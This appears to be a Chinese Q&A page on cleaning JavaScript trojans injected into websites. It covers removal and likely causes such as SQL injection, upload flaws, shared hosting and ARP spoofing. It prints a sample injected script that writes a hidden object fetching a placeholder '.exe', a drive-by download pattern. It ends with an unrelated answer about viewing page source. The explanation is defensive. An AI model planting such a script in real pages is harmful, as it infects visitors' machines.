关于网站被注入JS木马的问题,高手进来看看.

JavaScript014

关于网站被注入JS木马的问题,高手进来看看.,第1张

清除:可以用DW批量查找<script

language=javascript

src=一个网址></script>然后删除

或者使用Macfee

网站被挂马批量清除工具

来清除木马。

在清理完木马以后,尽量查找出是哪里出了问题,导致被挂马

有如下i个原因:1:网站自身安全漏洞,在程序上存在安全问题

比如SQL注入或者upfile上传漏洞

所以只要查找出问题所在

这就很容易去修复了,

如果你使用网上提供的开源的程序,那我想也会有针对漏洞的补丁。再或者你修复不明白的话就删除或者禁用这个文件。

2:如果你使用的是虚拟主机的话

可能是受同服务器下其他网站影响

3:如果你是单独服务器

在自身网站没问题的情况下,可能是ARP

<script language='javascript'>

s+='<object id="runit" width=0 height=0 type="application/x-oleobject'"

s+='codebase="xxxxx.exe#version=1,1,1,1">'

s+='<param name="_version" value="65536">'

s+='</object>'

s+='<html>...</html>'

document.open()

document.clear()

document.writeln(s)

document.close()

</script>

你是要下载HTML网页中的js么?

用chrome访问网页,viewsource查看网页源代码,找到要下载的js文件,点击就打开了,然后拷贝或者另存就行。

浏览器都有查看网页源代码功能的